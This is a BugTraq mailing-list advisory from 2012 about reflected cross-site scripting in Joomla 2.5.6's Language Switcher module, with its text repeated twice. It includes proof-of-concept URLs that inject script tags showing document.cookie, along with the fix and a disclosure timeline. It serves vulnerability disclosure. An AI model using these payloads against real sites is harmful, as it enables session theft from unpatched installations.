BugTraq
Back to list
|
Post reply
Joomla 2.5.6 Multiple Cross-site scripting vulnerabilities
Sep 18 2012 08:27PM
sschurtz darksecurity de
Advisory: Joomla 2.5.6 Multiple Cross-site scripting vulnerabilities
Advisory ID: SSCHADV2012-014
Author: Stefan Schurtz
Affected Software: Successfully tested on Joomla 2.5.6
Vendor URL: http://www.joomla.org/
Vendor Status: fixed
==========================
Vulnerability Description
==========================
With activated "Module Language Switcher . position-4" (Extensions -> Modules -> Module Manager: Module Language Switcher), multiple XSS are possible.
==================
PoC-Exploit
==================
// with default sample content
http://[target]/joomla/index.php/image-gallery/"><script>alert(document.
cookie)</script>/25-koala
http://[target]/joomla/index.php/image-gallery/"><script>alert('xss')</s
cript>/25-koala
http://[target]/joomla/index.php/image-gallery/animals/25-"><script>aler
t(document.cookie)</script>
http://[target]/joomla/index.php/image-gallery/animals/25-"><script>aler
t('xss')</script>
=========
Solution
=========
Upgrade to version 2.5.7
====================
Disclosure Timeline
====================
28-Jun-2012 - vendor informed (security (at) joomla (dot) org [email concealed])
05-Jul-2012 - vendor informed again (security (at) joomla (dot) org [email concealed])
13-Sep-2012 - fixed by vendor
========
Credits
========
Vulnerabilities found and advisory written by Stefan Schurtz.
===========
References
===========
http://developer.joomla.org/security/news/540-20120902-core-xss-vulnerab
ility
http://www.darksecurity.de/advisories/2012/SSCHADV2012-014.txt
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
Advisory ID: SSCHADV2012-014
Author: Stefan Schurtz
Affected Software: Successfully tested on Joomla 2.5.6
Vendor URL: http://www.joomla.org/
Vendor Status: fixed
==========================
Vulnerability Description
==========================
With activated "Module Language Switcher . position-4" (Extensions -> Modules -> Module Manager: Module Language Switcher), multiple XSS are possible.
==================
PoC-Exploit
==================
// with default sample content
http://[target]/joomla/index.php/image-gallery/"><script>alert(document.
cookie)</script>/25-koala
http://[target]/joomla/index.php/image-gallery/"><script>alert('xss')</s
cript>/25-koala
http://[target]/joomla/index.php/image-gallery/animals/25-"><script>aler
t(document.cookie)</script>
http://[target]/joomla/index.php/image-gallery/animals/25-"><script>aler
t('xss')</script>
=========
Solution
=========
Upgrade to version 2.5.7
====================
Disclosure Timeline
====================
28-Jun-2012 - vendor informed (security (at) joomla (dot) org [email concealed])
05-Jul-2012 - vendor informed again (security (at) joomla (dot) org [email concealed])
13-Sep-2012 - fixed by vendor
========
Credits
========
Vulnerabilities found and advisory written by Stefan Schurtz.
===========
References
===========
http://developer.joomla.org/security/news/540-20120902-core-xss-vulnerab
ility
http://www.darksecurity.de/advisories/2012/SSCHADV2012-014.txt
[ reply ]